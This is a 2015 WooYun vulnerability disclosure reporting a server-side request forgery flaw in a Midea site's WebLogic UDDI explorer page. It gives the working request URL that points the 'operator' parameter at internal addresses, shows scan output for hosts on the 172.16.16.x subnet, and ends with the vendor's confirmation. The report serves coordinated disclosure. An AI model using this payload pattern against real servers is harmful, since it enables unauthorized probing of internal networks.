当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144951

漏洞标题:美的某站ssrf可探测内网

相关厂商:midea.com

漏洞作者: jianFen

提交时间:2015-10-06 09:16

修复时间:2015-11-21 19:36

公开时间:2015-11-21 19:36

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-06: 细节已通知厂商并且等待厂商处理中
2015-10-07: 厂商已经确认,细节仅向厂商公开
2015-10-17: 细节向核心白帽子及相关领域专家公开
2015-10-27: 细节向普通白帽子公开
2015-11-06: 细节向实习白帽子公开
2015-11-21: 细节向公众公开

简要描述:

- -
美的是积极的好厂商 哈哈

详细说明:

http://ccs.midea.com.cn:8081/uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.16.16.49:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search


QQ Photo20151005224243.jpg


C段探测


http://172.16.16.1/  closed
http://172.16.16.2/  closed
http://172.16.16.3/  closed
http://172.16.16.8/weblogic.uddi.client.structures.exception.XML_SoapException:
The server at http://172.16.16.8/ returned a 500 error code (Internal Serve
 Error).  Please ensure that your URL is correct, and the web service has d
ployed.
http://172.16.16.16/  closed
http://172.16.16.17/  closed
http://172.16.16.18/  closed
http://172.16.16.19/weblogic.uddi.client.structures.exception.XML_SoapException
 Received a response from url: http://172.16.16.19/ which did not have a valid
OAP content-type: text/html&#59;charset=GBK.
http://172.16.16.21/weblogic.uddi.client.structures.exception.XML_SoapException
 Connection reset
http://172.16.16.22/weblogic.uddi.client.structures.exception.XML_SoapException
 Connection reset
http://172.16.16.23/weblogic.uddi.client.structures.exception.XML_SoapException
 Received a response from url: http://172.16.16.23/ which did not have a valid
OAP content-type: text/html&#59;charset=GBK.
http://172.16.16.24/
http://172.16.16.25/  closed
http://172.16.16.26/  closed
http://172.16.16.27/ closed
http://172.16.16.29/weblogic.uddi.client.structures.exception.XML_SoapException
 Received a response from url: http://172.16.16.29/ which did not have a valid
OAP content-type: null.
http://172.16.16.38/weblogic.uddi.client.structures.exception.XML_SoapException
 Received a response from url: http://172.16.16.38/ which did not have a valid
OAP content-type: text/html.

漏洞证明:

An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://172.16.16.49:25 which did not have a valid SOAP content-type: null.

修复方案:

限制访问

版权声明:转载请注明来源 jianFen@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-07 19:35

厂商回复:

感谢乌云白帽子@jianFen(减分?简芬?捡粪?(-。-;)不忍直视)的提醒,我们继续召唤应用管理员救火。

最新状态:

暂无